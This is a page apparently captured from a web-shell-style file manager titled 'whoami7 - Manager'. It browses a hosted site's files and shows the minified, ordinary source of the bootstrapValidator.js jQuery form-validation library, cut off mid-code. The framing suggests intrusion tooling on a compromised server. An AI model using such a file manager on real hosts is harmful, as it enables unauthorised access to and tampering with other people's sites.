whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
home
/
papecmvm
/
www
/
bootstrap
/
js
/
Upload File:
files >> //proc/thread-self/root/home/papecmvm/www/bootstrap/js/bootstrapValidator.js
!function(t){var e=function(e,a){this.$form=t(e),this.options=t.extend({},t.fn.bootstrapValidator.DEFAULT_OPTIONS,a),this.$invalidFields=t([]),this.$submitButton=null,this.STATUS_NOT_VALIDATED="NOT_VALIDATED",this.STATUS_VALIDATING="VALIDATING",this.STATUS_INVALID="INVALID",this.STATUS_VALID="VALID";var r=function(){for(var t=3,e=document.createElement("div"),a=e.all||[];e.innerHTML="<!--[if gt IE "+ ++t+"]><br><![endif]-->",a[0];);return t>4?t:!t}(),s=document.createElement("div");this._changeEvent=9!==r&&"oninput"in s?"input":"keyup",this._submitIfValid=null,this._cacheFields={},this._init()};e.prototype={constructor:e,_init:function(){var e=this,a={excluded:this.$form.attr("data-bv-excluded"),trigger:this.$form.attr("data-bv-trigger"),message:this.$form.attr("data-bv-message"),container:this.$form.attr("data-bv-container"),group:this.$form.attr("data-bv-group"),submitButtons:this.$form.attr("data-bv-submitbuttons"),threshold:this.$form.attr("data-bv-threshold"),live:this.$form.attr("data-bv-live"),onSuccess:this.$form.attr("data-bv-onsuccess"),onError:this.$form.attr("data-bv-onerror"),fields:{},feedbackIcons:{valid:this.$form.attr("data-bv-feedbackicons-valid"),invalid:this.$form.attr("data-bv-feedbackicons-invalid"),validating:this.$form.attr("data-bv-feedbackicons-validating")}};this.$form.attr("novalidate","novalidate").addClass(this.options.elementClass).on("submit.bv",function(t){t.preventDefault(),e.validate()}).on("click.bv",this.options.submitButtons,function(){e.$submitButton=t(this),e._submitIfValid=!0}).find("[name], [data-bv-field]").each(function(){var r=t(this),s=r.attr("name")||r.attr("data-bv-field"),i=e._parseOptions(r);i&&(r.attr("data-bv-field",s),a.fields[s]=t.extend({},i,a.fields[s]))}),this.options=t.extend(!0,this.options,a);for(var r in this.options.fields)this._initField(r);this.$form.trigger(t.Event("init.form.bv"),{bv:this,options:this.options}),this.options.onSuccess&&this.$form.on("success.form.bv",function(a){t.fn.bootstrapValidator.helpers.call(e.options.onSuccess,[a])}),this.options.onError&&this.$form.on("error.form.bv",function(a){t.fn.bootstrapValidator.helpers.call(e.options.onError,[a])})},_parseOptions:function(e){var a,r,s,i,n,o,l,d=e.attr("name")||e.attr("data-bv-field"),u={};for(r in t.fn.bootstrapValidator.validators)if(a=t.fn.bootstrapValidator.validators[r],s=e.attr("data-bv-"+r.toLowerCase())+"",l="function"==typeof a.enableByHtml5?a.enableByHtml5(e):null,l&&"false"!==s||l!==!0&&(""===s||"true"===s)){a.html5Attributes=t.extend({},{message:"message",onerror:"onError",onsuccess:"onSuccess"},a.html5Attributes),u[r]=t.extend({},l===!0?{}:l,u[r]);for(o in a.html5Attributes)i=a.html5Attributes[o],n=e.attr("data-bv-"+r.toLowerCase()+"-"+o),n&&("true"===n?n=!0:"false"===n&&(n=!1),u[r][i]=n)}var f={excluded:e.attr("data-bv-excluded"),feedbackIcons:e.attr("data-bv-feedbackicons"),trigger:e.attr("data-bv-trigger"),message:e.attr("data-bv-message"),container:e.attr("data-bv-container"),group:e.attr("data-bv-group"),selector:e.attr("data-bv-selector"),threshold:e.attr("data-bv-threshold"),onStatus:e.attr("data-bv-onstatus"),onSuccess:e.attr("data-bv-onsuccess"),onError:e.attr("data-bv-onerror"),validators:u},p=t.isEmptyObject(f),c=t.isEmptyObject(u);return!c||!p&&this.options.fields&&this.options.fields[d]?(f.validators=u,f):null},_initField:function(e){var a=t([]);switch(typeof e){case"object":a=e,e=e.attr("data-bv-field");break;case"string":a=this.getFieldElements(e),a.attr("data-bv-field",e)}if(null!==this.options.fields[e]&&null!==this.options.fields[e].validators){if(0===a.length)return void delete this.options.fields[e];var r;for(r in this.options.fields[e].validators)t.fn.bootstrapValidator.validators[r]||delete this.options.fields[e].validators[r];null===this.options.fields[e].enabled&&(this.options.fields[e].enabled=!0);for(var s=this,i=a.length,n=a.attr("type"),o=1===i||"radio"===n||"checkbox"===n,l="radio"===n||"checkbox"===n||"file"===n||"SELECT"===a.eq(0).get(0).tagName?"change":this._changeEvent,d=(this.options.fields[e].trigger||this.options.trigger||l).split(" "),u=t.map(d,function(t){return t+".update.bv"}).join(" "),f=0;i>f;f++){var p=a.eq(f),c=this.options.fields[e].group||this.options.group,v=p.parents(c),h=this.options.fields[e].container||this.options.container,b=h&&"tooltip"!==h&&"popover"!==h?t(h):this._getMessageContainer(p,c);h&&"tooltip"!==h&&"popover"!==h&&b.addClass("has-error"),b.find('.help-block[data-bv-validator][data-bv-for="'+e+'"]').remove(),v.find('i[data-bv-icon-for="'+e+'"]').remove(),p.off(u).on(u,function(){s.updateStatus(t(this),s.STATUS_NOT_VALIDATED)}),p.data("bv.messages",b);for(r in this.options.fields[e].validators)p.data("bv.result."+r,this.STATUS_NOT_VALIDATED),o&&f!==i-1||t("<small/>").css("display","none").addClass("help-block").attr("data-bv-validator",r).attr("data-bv-for",e).attr("data-bv-result",this.STATUS_NOT_VALIDATED).html(this._getMessage(e,r)).appendTo(b),this.options.fields[e].validators[r].onSuccess&&p.on("success.validator.bv",function(a,i){t.fn.bootstrapValidator.helpers.call(s.options.fields[e].validators[r].onSuccess,[a,i])}),this.options.fields[e].validators[r].onError&&p.on("error.validator.bv",function(a,i){t.fn.bootstrapValidator.helpers.call(s.options.fields[e].validators[r].onError,[a,i])});if(this.options.fields[e].feedbackIcons!==!1&&"false"!==this.options.fields[e].feedbackIcons&&this.options.feedbackIcons&&this.options.feedbackIcons.validating&&this.options.feedbackIcons.invalid&&this.options.feedbackIcons.valid&&(!o||f===i-1)){v.removeClass("has-success").removeClass("has-error").addClass("has-feedback");var A=t("<i/>").css("display","none").addClass("form-control-feedback").attr("data-bv-icon-for",e).insertAfter("checkbox"===n||"radio"===n?p.parent():p);0===v.find("label").length&&A.css("top",0),0!==v.find(".input-group").length&&A.css({top:0,"z-index":100}).insertAfter(v.find(".input-group").eq(0))}}switch(this.options.fields[e].onSuccess&&a.on("success.field.bv",function(a,r){t.fn.bootstrapValidator.helpers.call(s.options.fields[e].onSuccess,[a,r])}),this.options.fields[e].onError&&a.on("error.field.bv",function(a,r){t.fn.bootstrapValidator.helpers.call(s.options.fields[e].onError,[a,r])}),this.options.fields[e].onStatus&&a.on("status.field.bv",function(a,r){t.fn.bootstrapValidator.helpers.call(s.options.fields[e].onStatus,[a,r])}),u=t.map(d,function(t){return t+".live.bv"}).join(" "),this.options.live){case"submitted":break;case"disabled":a.off(u);break;case"enabled":default:a.off(u).on(u,function(){s._exceedThreshold(t(this))&&s.validateField(t(this))})}a.trigger(t.Event("init.field.bv"),{bv:this,field:e,element:a})}},_getMessage:function(e,a){if(!(this.options.fields[e]&&t.fn.bootstrapValidator.validators[a]&&this.options.fields[e].validators&&this.options.fields[e].validators[a]))return"";var r=this.options.fields[e].validators[a];switch(!0){case!!r.message:return r.message;case!!this.options.fields[e].message:return this.options.fields[e].message;case!!t.fn.bootstrapValidator.i18n[a]:return t.fn.bootstrapValidator.i18n[a]["default"];default:return this.options.message}},_getMessageContainer:function(t,e){var a=t.parent();if(a.is(e))return a;var r=a.attr("class");if(!r)return this._getMessageContainer(a,e);r=r.split(" ");for(var s=r.length,i=0;s>i;i++)if(/^col-(xs|sm|md|lg)-\d+$/.test(r[i])||/^col-(xs|sm|md|lg)-offset-\d+$/.test(r[i]))return a;return this._getMessageContainer(a,e)},_submit:function(){var e=this.isValid(),a=e?"success.form.bv":"error.form.bv",r=t.Event(a);this.$form.trigger(r),this.$submitButton&&(e?this._onSuccess(r):this._onError(r))},_isExcluded:function(e){var a=e.attr("data-bv-excluded"),r=e.attr("data-bv-field")||e.attr("name");switch(!0){case!!r&&this.options.fields&&this.options.fields[r]&&("true"===this.options.fields[r].excluded||this.options.fields[r].excluded===!0):case"true"===a:case""===a:return!0;case!!r&&this.options.fields&&this.options.fields[r]&&("false"===this.options.fields[r].excluded||this.options.fields[r].excluded===!1):case"false"===a:return!1;default:if(this.options.excluded){"string"==typeof this.options.excluded&&(this.options.excluded=t.map(this.options.excluded.split(","),function(e){return t.trim(e)}));for(var s=this.options.excluded.length,i=0;s>i;i++)if("string"==typeof this.options.excluded[i]&&e.is(this.options.excluded[i])||"function"==typeof this.options.excluded[i]&&this.options.excluded[i].call(this,e,this)===!0)return!0}return!1}},_exceedThreshold:function(e){var a=e.attr("data-bv-field"),r=this.options.fields[a].threshold||this.options.threshold;if(!r)return!0;var s=-1!==t.inArray(e.attr("type"),["button","checkbox","file","hidden","image","radio","reset","submit"]);return s||e.val().length>=r},_onError:function(e){if(!e.isDefaultPrevented()){if("submitted"===this.options.live){this.options.live="enabled";var a=this;for(var r in this.options.fields)!function(e){var s=a.getFieldElements(e);if(s.length){var i=t(s[0]).attr("type"),n="radio"===i||"checkbox"===i||"file"===i||"SELECT"===t(s[0]).get(0).tagName?"change":a._changeEvent,o=a.options.fields[r].trigger||a.options.trigger||n,l=t.map(o.split(" "),function(t){return t+".live.bv"}).join(" ");s.off(l).on(l,function(){a._exceedThreshold(t(this))&&a.validateField(t(this))})}}(r)}var s=this.$invalidFields.eq(0);if(s){var i,n=s.parents(".tab-pane");n&&(i=n.attr("id"))&&t('a[href="#'+i+'"][data-toggle="tab"]').tab("show"),s.focus()}}},_onSuccess:function(t){t.isDefaultPrevented()||this.disableSubmitButtons(!0).defaultSubmit()},_onFieldValidated:function(e,a){var r=e.attr("data-bv-field"),s=this.options.fields[r].validators,i={},n=0,o={bv:this,field:r,element:e,validator:a};if(a)switch(e.data("bv.result."+a)){case this.STATUS_INVALID:e.trigger(t.Event("error.validator.bv"),o);break;case this.STATUS_VALID:e.trigger(t.Event("success.validator.bv"),o)}i[this.STATUS_NOT_VALIDATED]=0,i[this.STATUS_VALIDATING]=0,i[this.STATUS_INVALID]=0,i[this.STATUS_VALID]=0;for(var l in s)if(s[l].enabled!==!1){n++;var d=e.data("bv.result."+l);d&&i[d]++}i[this.STATUS_VALID]===n?(this.$invalidFields=this.$invalidFields.not(e),e.trigger(t.Event("success.field.bv"),o)):0===i[this.STATUS_NOT_VALIDATED]&&0===i[this.STATUS_VALIDATING]&&i[this.STATUS_INVALID]>0&&(this.$invalidFields=this.$invalidFields.add(e),e.trigger(t.Event("error.field.bv"),o))},getFieldElements:function(e){return this._cacheFields[e]||(this._cacheFields[e]=this.options.fields[e]&&this.options.fields[e].selector?t(this.options.fields[e].selector):this.$form.find('[name="'+e+'"]')),this._cacheFields[e]},disableSubmitButtons:function(t){return t&&"disabled"!==this.options.live,this},validate:function(){if(!this.options.fields)return this;this.disableSubmitButtons(!0);for(var t in this.options.fields)this.validateField(t);return this._submit(),this},validateField:function(e){var a=t([]);switch(typeof e){case"object":a=e,e=e.attr("data-bv-field");break;case"string":a=this.getFieldElements(e)}if(this.options.fields[e]&&this.options.fields[e].enabled===!1)return this;for(var r,s,i=this,n=a.attr("type"),o="radio"===n||"checkbox"===n?1:a.length,l="radio"===n||"checkbox"===n,d=this.options.fields[e].validators,u=0;o>u;u++){var f=a.eq(u);if(!this._isExcluded(f))for(r in d){f.data("bv.dfs."+r)&&f.data("bv.dfs."+r).reject();var p=f.data("bv.result."+r);p!==this.STATUS_VALID&&p!==this.STATUS_INVALID&&d[r].enabled!==!1?(f.data("bv.result."+r,this.STATUS_VALIDATING),s=t.fn.bootstrapValidator.validators[r].validate(this,f,d[r]),"object"==typeof s&&s.resolve?(this.updateStatus(l?e:f,this.STATUS_VALIDATING,r),f.data("bv.dfs."+r,s),s.done(function(t,e,a,r){t.removeData("bv.dfs."+e),r&&i.updateMessage(t,e,r),i.updateStatus(l?t.attr("data-bv-field"):t,a?i.STATUS_VALID:i.STATUS_INVALID,e),a&&i._submitIfValid===!0&&i._submit()})):"object"==typeof s&&void 0!==s.valid&&void 0!==s.message?(this.updateMessage(l?e:f,r,s.message),this.updateStatus(l?e:f,s.valid?this.STATUS_VALID:this.STATUS_INVALID,r)):"boolean"==typeof s&&this.updateStatus(l?e:f,s?this.STATUS_VALID:this.STATUS_INVALID,r)):this._onFieldValidated(f,r)}}return this},updateMessage:function(e,a,r){var s=t([]);switch(typeof e){case"object":s=e,e=e.attr("data-bv-field");break;case"string":s=this.getFieldElements(e)}s.each(function(){t(this).data("bv.messages").find('.help-block[data-bv-validator="'+a+'"][data-bv-for="'+e+'"]').html(r)})},updateStatus:function(e,a,r){var s=t([]);switch(typeof e){case"object":s=e,e=e.attr("data-bv-field");break;case"string":s=this.getFieldElements(e)}a===this.STATUS_NOT_VALIDATED&&(this._submitIfValid=!1);for(var i=this,n=s.attr("type"),o=this.options.fields[e].group||this.options.group,l="radio"===n||"checkbox"===n?1:s.length,d=0;l>d;d++){var u=s.eq(d);if(!this._isExcluded(u)){var f=u.parents(o),p=u.data("bv.messages"),c=p.find('.help-block[data-bv-validator][data-bv-for="'+e+'"]'),v=r?c.filter('[data-bv-validator="'+r+'"]'):c,h=f.find('.form-control-feedback[data-bv-icon-for="'+e+'"]'),b=this.options.fields[e].container||this.options.container,A=null;if(r)u.data("bv.result."+r,a);else for(var m in this.options.fields[e].validators)u.data("bv.result."+m,a);v.attr("data-bv-result",a);var g,I,V=u.parents(".tab-pane");switch(V&&(g=V.attr("id"))&&(I=t('a[href="#'+g+'"][data-toggle="tab"]').parent()),a){case this.STATUS_VALIDATING:A=null,this.disableSubmitButtons(!0),f.removeClass("has-success").removeClass("has-error"),h&&h.removeClass(this.options.feedbackIcons.valid).removeClass(this.options.feedbackIcons.invalid).addClass(this.options.feedbackIcons.validating).show(),I&&I.removeClass("bv-tab-success").removeClass("bv-tab-error");break;case this.STATUS_INVALID:A=!1,this.disableSubmitButtons(!0),f.removeClass("has-success").addClass("has-error"),h&&h.removeClass(this.options.feedbackIcons.valid).removeClass(this.options.feedbackIcons.validating).addClass(this.options.feedbackIcons.invalid).show(),I&&I.removeClass("bv-tab-success").addClass("bv-tab-error");break;case this.STATUS_VALID:A=0===c.filter('[data-bv-result="'+this.STATUS_NOT_VALIDATED+'"]').length?c.filter('[data-bv-result="'+this.STATUS_VALID+'"]').length===c.length:null,null!==A&&(this.disableSubmitButtons(this.$submitButton?!this.isValid():!A),h&&h.removeClass(this.options.feedbackIcons.invalid).removeClass(this.options.feedbackIcons.validating).removeClass(this.options.feedbackIcons.valid).addClass(A?this.options.feedbackIcons.valid:this.options.feedbackIcons.invalid).show()),f.removeClass("has-error has-success").addClass(this.isValidContainer(f)?"has-success":"has-error"),I&&I.removeClass("bv-tab-success").removeClass("bv-tab-error").addClass(this.isValidContainer(V)?"bv-tab-success":"bv-tab-error");break;case this.STATUS_NOT_VALIDATED:default:A=null,this.disableSubmitButtons(!1),f.removeClass("has-success").removeClass("has-error"),h&&h.removeClass(this.options.feedbackIcons.valid).removeClass(this.options.feedbackIcons.invalid).removeClass(this.options.feedbackIcons.validating).hide(),I&&I.removeClass("bv-tab-success").removeClass("bv-tab-error")}switch(!0){case h&&"tooltip"===b:A===!1?h.css("cursor","pointer").tooltip("destroy").tooltip({html:!0,placement:"top",title:c.filter('[data-bv-result="'+i.STATUS_INVALID+'"]').eq(0).html()}):h.css("cursor","").tooltip("destroy");break;case h&&"popover"===b:A===!1?h.css("cursor","pointer").popover("destroy").popover({content:c.filter('[data-bv-result="'+i.STATUS_INVALID+'"]').eq(0).html(),html:!0,placement:"top",trigger:"hover click"}):h.css("cursor","").popover("destroy");break;default:a===this.STATUS_INVALID?v.show():v.hide()}u.trigger(t.Event("status.field.bv"),{bv:this,field:e,element:u,status:a}),this._onFieldValidated(u,r)}}return this},isValid:function(){for(var t in this.options.fields)if(!this.isValidField(t))return!1;return!0},isValidField:function(e){var a=t([]);switch(typeof e){case"object":a=e,e=e.attr("data-bv-field");break;case"string":a=this.getFieldElements(e)}if(0===a.length||null===this.options.fields[e]||this.options.fields[e].enabled===!1)return!0;for(var r,s,i,n=a.attr("type"),o="radio"===n||"checkbox"===n?1:a.length,l=0;o>l;l++)if(r=a.eq(l),!this._isExcluded(r))for(s in this.options.fields[e].validators)if(this.options.fields[e].validators[s].enabled!==!1&&(i=r.data("bv.result."+s),i!==this.STATUS_VALID))return!1;return!0},isValidContainer:function(e){var a=this,r={},s="string"==typeof e?t(e):e;if(0===s.length)return!0;s.find("[data-bv-field]").each(function(){var e=t(this),s=e.attr("data-bv-field");a._isExcluded(e)||r[s]||(r[s]=e)});for(var i in r){var n=r[i];if(0!==n.data("bv.messages").find('.help-block[data-bv-validator][data-bv-for="'+i+'"]').filter(function(){var e=t(this).attr("data-bv-validator"),r=t(this).attr("data-bv-for");return a.options.fields[r].validators[e].enabled!==!1&&n.data("bv.result."+e)&&n.data("bv.result."+e)!==a.STATUS_VALID}).length)return!1}return!0},defaultSubmit:function(){this.$submitButton&&t("<input/>").attr("type","hidden").attr("data-bv-submit-hidden","").attr("name",this.$submitButton.attr("name")).val(this.$submitButton.val()).appendTo(this.$form),this.$form.off("submit.bv").submit()},getInvalidFields:function(){return this.$invalidFields},getSubmitButton:function(){return this.$submitButton},getMessages:function(e,a){var r=this,s=[],i=t([]);switch(!0){case e&&"object"==typeof e:i=e;break;case e&&"string"==typeof e:var n=this.getFieldElements(e);if(n.length>0){var o=n.attr("type");i="radio"===o||"checkbox"===o?n.eq(0):n}break;default:i=this.$invalidFields}var l=a?'[data-bv-validator="'+a+'"]':"";return i.each(function(){s=s.concat(t(this).data("bv.messages").find('.help-block[data-bv-for="'+t(this).attr("data-bv-field")+'"][data-bv-result="'+r.STATUS_INVALID+'"]'+l).map(function(){var e=t(this).attr("data-bv-validator"),a=t(this).attr("data-bv-for");return r.options.fields[a].validators[e].enabled===!1?"":t(this).html()}).get())}),s},getOptions:function(t,e,a){if(!t)return this.options;if("object"==typeof t&&(t=t.attr("data-bv-field")),!this.options.fields[t])return null;var r=this.options.fields[t];return e?r.validators&&r.validators[e]?a?r.validators[e][a]:r.validators[e]:null:r},updateOption:function(t,e,a,r){return"object"==typeof t&&(t=t.attr("data-bv-field")),this.options.fields[t]&&this.options.fields[t].validators[e]&&(this.options.fields[t].validators[e][a]=r,this.updateStatus(t,this.STATUS_NOT_VALIDATED,e)),this},addField:function(e,a){var r=t([]);switch(typeof e){case"object":r=e,e=e.attr("data-bv-field")||e.attr("name");break;case"string":delete this._cacheFields[e],r=this.getFieldElements(e)}r.attr("data-bv-field",e);for(var s=r.attr("type"),i="radio"===s||"checkbox"===s?1:r.length,n=0;i>n;n++){var o=r.eq(n),l=this._parseOptions(o);l=null===l?a:t.extend(!0,a,l),this.options.fields[e]=t.extend(!0,this.options.fields[e],l),this._cacheFields[e]=this._cacheFields[e]?this._cacheFields[e].add(o):o,this._initField("checkbox"===s||"radio"===s?e:o)}return this.disableSubmitButtons(!1),this.$form.trigger(t.Event("added.field.bv"),{field:e,element:r,options:this.options.fields[e]}),this},removeField:function(e){var a=t([]);switch(typeof e){case"object":a=e,e=e.attr("data-bv-field")||e.attr("name"),a.attr("data-bv-field",e);break;case"string":a=this.getFieldElements(e)}if(0===a.length)return this;for(var r=a.attr("type"),s="radio"===r||"checkbox"===r?1:a.length,i=0;s>i;i++){var n=a.eq(i);this.$invalidFields=this.$invalidFields.not(n),this._cacheFields[e]=this._cacheFields[e].not(n)}return this._cacheFields[e]&&0!==this._cacheFields[e].length||delete this.options.fields[e],("checkbox"===r||"radio"===r)&&this._initField(e),this.disableSubmitButtons(!1),this.$form.trigger(t.Event("removed.field.bv"),{field:e,element:a}),this},resetField:function(e,a){var r=t([]);switch(typeof e){case"object":r=e,e=e.attr("data-bv-field");break;case"string":r=this.getFieldElements(e)}var s=r.length;if(this.options.fields[e])for(var i=0;s>i;i++)for(var n in this.options.fields[e].validators)r.eq(i).removeData("bv.dfs."+n);if(this.updateStatus(e,this.STATUS_NOT_VALIDATED),a){var o=r.attr("type");"radio"===o||"checkbox"===o?r.removeAttr("checked").removeAttr("selected"):r.val("")}return this},resetForm:function(e){for(var a in this.options.fields)this.resetField(a,e);return this.$invalidFields=t([]),this.$submitButton=null,this.disableSubmitButtons(!1),this},revalidateField:function(t){return this.updateStatus(t,this.STATUS_NOT_VALIDATED).validateField(t),this},enableFieldValidators:function(t,e,a){var r=this.options.fields[t].validators;if(a&&r&&r[a]&&r[a].enabled!==e)this.options.fields[t].validators[a].enabled=e,this.updateStatus(t,this.STATUS_NOT_VALIDATED,a);else if(!a&&this.options.fields[t].enabled!==e){this.options.fields[t].enabled=e;for(var s in r)this.enableFieldValidators(t,e,s)}return this},getDynamicOption:function(e,a){var r="string"==typeof e?this.getFieldElements(e):e,s=r.val();if("function"==typeof a)return t.fn.bootstrapValidator.helpers.call(a,[s,this,r]);if("string"==typeof a){var i=this.getFieldElements(a);return i.length?i.val():t.fn.bootstrapValidator.helpers.call(a,[s,this,r])}return null},destroy:function(){var t,e,a,r,s,i,n;for(t in this.options.fields){e=this.getFieldElements(t),i=this.options.fields[t].container||this.options.container,n=this.options.fields[t].group||this.options.group;for(var o=0;o<e.length;o++){if(a=e.eq(o),a.data("bv.messages").find('.help-block[data-bv-validator][data-bv-for="'+t+'"]').remove().end().end().removeData("bv.messages").parents(n).removeClass("has-feedback has-error has-success").end().off(".bv").removeAttr("data-bv-field"),s=a.parents(n).find('i[data-bv-icon-for="'+t+'"]'))switch(i){case"tooltip":s.tooltip("destroy").remove();break;case"popover":s.popover("destroy").remove();break;default:s.remove()}for(r in this.options.fields[t].validators)a.data("bv.dfs."+r)&&a.data("bv.dfs."+r).reject(),a.removeData("bv.result."+r).removeData("bv.dfs."+r)}}this.disableSubmitButtons(!1),this.$form.removeClass(this.options.elementClass).off(".bv").removeData("bootstrapValidator").find("[data-bv-submit-hidden]").remove()}},t.fn.bootstrapValidator=function(a){var r=arguments;return this.each(function(){var s=t(this),i=s.data("bootstrapValidator"),n="object"==typeof a&&a;i||(i=new e(this,n),s.data("bootstrapValidator",i)),"string"==typeof a&&i[a].apply(i,Array.prototype.slice.call(r,1))})},t.fn.bootstrapValidator.DEFAULT_OPTIONS={elementClass:"bv-form",message:"This value is not valid",group:".form-group",container:null,threshold:null,excluded:[":disabled",":hidden",":not(:visible)"],feedbackIcons:{valid:null,invalid:null,validating:null},submitButtons:'[type="submit"]',live:"enabled",fields:null},t.fn.bootstrapValidator.validators={},t.fn.bootstrapValidator.i18n={},t.fn.bootstrapValidator.Constructor=e,t.fn.bootstrapValidator.helpers={call:function(t,e){if("function"==typeof t)return t.apply(this,e);if("string"==typeof t){"()"===t.substring(t.length-2)&&(t=t.substring(0,t.length-2));for(var a=t.split("."),r=a.pop(),s=window,i=0;i<a.length;i++)s=s[a[i]];return s[r].apply(this,e)}},format:function(e,a){t.isArray(a)||(a=[a]);for(var r in a)e=e.replace("%s",a[r]);return e},date:function(t,e,a,r){if(isNaN(t)||isNaN(e)||isNaN(a))return!1;if(a=parseInt(a,10),e=parseInt(e,10),t=parseInt(t,10),1e3>t||t>9999||0>=e||e>12)return!1;var s=[31,28,31,30,31,30,31,31,30,31,30,31];if((t%400===0||t%100!==0&&t%4===0)&&(s[1]=29),0>=a||a>s[e-1])return!1;if(r===!0){var i=new Date,n=i.getFullYear(),o=i.getMonth(),l=i.getDate();return n>t||t===n&&o>e-1||t===n&&e-1===o&&l>a}return!0},luhn:function(t){for(var e=t.length,a=0,r=[[0,1,2,3,4,5,6,7,8,9],[0,2,4,6,8,1,3,5,7,9]],s=0;e--;)s+=r[a][parseInt(t.charAt(e),10)],a^=1;return s%10===0&&s>0},mod11And10:function(t){for(var e=5,a=t.length,r=0;a>r;r++)e=(2*(e||10)%11+parseInt(t.charAt(r),10))%10;return 1===e},mod37And36:function(t,e){e=e||"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";for(var a=e.length,r=t.length,s=Math.floor(a/2),i=0;r>i;i++)s=(2*(s||a)%(a+1)+e.indexOf(t.charAt(i)))%a;return 1===s}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.base64=t.extend(t.fn.bootstrapValidator.i18n.base64||{},{"default":"Please enter a valid base 64 encoded"}),t.fn.bootstrapValidator.validators.base64={validate:function(t,e,a){var r=e.val();return""===r?!0:/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/.test(r)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.between=t.extend(t.fn.bootstrapValidator.i18n.between||{},{"default":"Please enter a value between %s and %s",notInclusive:"Please enter a value between %s and %s strictly"}),t.fn.bootstrapValidator.validators.between={html5Attributes:{message:"message",min:"min",max:"max",inclusive:"inclusive"},enableByHtml5:function(t){return"range"===t.attr("type")?{min:t.attr("min"),max:t.attr("max")}:!1},validate:function(e,a,r){var s=a.val();if(""===s)return!0;var i=t.isNumeric(r.min)?r.min:e.getDynamicOption(a,r.min),n=t.isNumeric(r.max)?r.max:e.getDynamicOption(a,r.max);return s=parseFloat(s),r.inclusive===!0||void 0===r.inclusive?{valid:s>=i&&n>=s,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.between["default"],[i,n])}:{valid:s>i&&n>s,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.between.notInclusive,[i,n])}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.callback=t.extend(t.fn.bootstrapValidator.i18n.callback||{},{"default":"Please enter a valid value"}),t.fn.bootstrapValidator.validators.callback={html5Attributes:{message:"message",callback:"callback"},validate:function(e,a,r){var s=a.val();if(r.callback){var i=new t.Deferred,n=t.fn.bootstrapValidator.helpers.call(r.callback,[s,e,a]);return i.resolve(a,"callback","boolean"==typeof n?n:n.valid,"object"==typeof n&&n.message?n.message:null),i}return!0}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.choice=t.extend(t.fn.bootstrapValidator.i18n.choice||{},{"default":"Please enter a valid value",less:"Please choose %s options at minimum",more:"Please choose %s options at maximum",between:"Please choose %s - %s options"}),t.fn.bootstrapValidator.validators.choice={html5Attributes:{message:"message",min:"min",max:"max"},validate:function(e,a,r){var s=a.is("select")?e.getFieldElements(a.attr("data-bv-field")).find("option").filter(":selected").length:e.getFieldElements(a.attr("data-bv-field")).filter(":checked").length,i=r.min?t.isNumeric(r.min)?r.min:e.getDynamicOption(a,r.min):null,n=r.max?t.isNumeric(r.max)?r.max:e.getDynamicOption(a,r.max):null,o=!0,l=r.message||t.fn.bootstrapValidator.i18n.choice["default"];switch((i&&s<parseInt(i,10)||n&&s>parseInt(n,10))&&(o=!1),!0){case!!i&&!!n:l=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.choice.between,[parseInt(i,10),parseInt(n,10)]);break;case!!i:l=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.choice.less,parseInt(i,10));break;case!!n:l=t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.choice.more,parseInt(n,10))}return{valid:o,message:l}}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.creditCard=t.extend(t.fn.bootstrapValidator.i18n.creditCard||{},{"default":"Please enter a valid credit card number"}),t.fn.bootstrapValidator.validators.creditCard={validate:function(e,a,r){var s=a.val();if(""===s)return!0;if(/[^0-9-\s]+/.test(s))return!1;if(s=s.replace(/\D/g,""),!t.fn.bootstrapValidator.helpers.luhn(s))return!1;var i,n,o={AMERICAN_EXPRESS:{length:[15],prefix:["34","37"]},DINERS_CLUB:{length:[14],prefix:["300","301","302","303","304","305","36"]},DINERS_CLUB_US:{length:[16],prefix:["54","55"]},DISCOVER:{length:[16],prefix:["6011","622126","622127","622128","622129","62213","62214","62215","62216","62217","62218","62219","6222","6223","6224","6225","6226","6227","6228","62290","62291","622920","622921","622922","622923","622924","622925","644","645","646","647","648","649","65"]},JCB:{length:[16],prefix:["3528","3529","353","354","355","356","357","358"]},LASER:{length:[16,17,18,19],prefix:["6304","6706","6771","6709"]},MAESTRO:{length:[12,13,14,15,16,17,18,19],prefix:["5018","5020","5038","6304","6759","6761","6762","6763","6764","6765","6766"]},MASTERCARD:{length:[16],prefix:["51","52","53","54","55"]},SOLO:{length:[16,18,19],prefix:["6334","6767"]},UNIONPAY:{length:[16,17,18,19],prefix:["622126","622127","622128","622129","62213","62214","62215","62216","62217","62218","62219","6222","6223","6224","6225","6226","6227","6228","62290","62291","622920","622921","622922","622923","622924","622925"]},VISA:{length:[16],prefix:["4"]}};for(i in o)for(n in o[i].prefix)if(s.substr(0,o[i].prefix[n].length)===o[i].prefix[n]&&-1!==t.inArray(s.length,o[i].length))return!0;return!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.cusip=t.extend(t.fn.bootstrapValidator.i18n.cusip||{},{"default":"Please enter a valid CUSIP number"}),t.fn.bootstrapValidator.validators.cusip={validate:function(e,a,r){var s=a.val();if(""===s)return!0;if(s=s.toUpperCase(),!/^[0-9A-Z]{9}$/.test(s))return!1;for(var i=t.map(s.split(""),function(t){var e=t.charCodeAt(0);return e>="A".charCodeAt(0)&&e<="Z".charCodeAt(0)?e-"A".charCodeAt(0)+10:t}),n=i.length,o=0,l=0;n-1>l;l++){var d=parseInt(i[l],10);l%2!==0&&(d*=2),d>9&&(d-=9),o+=d}return o=(10-o%10)%10,o===i[n-1]}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.cvv=t.extend(t.fn.bootstrapValidator.i18n.cvv||{},{"default":"Please enter a valid CVV number"}),t.fn.bootstrapValidator.validators.cvv={html5Attributes:{message:"message",ccfield:"creditCardField"},validate:function(e,a,r){var 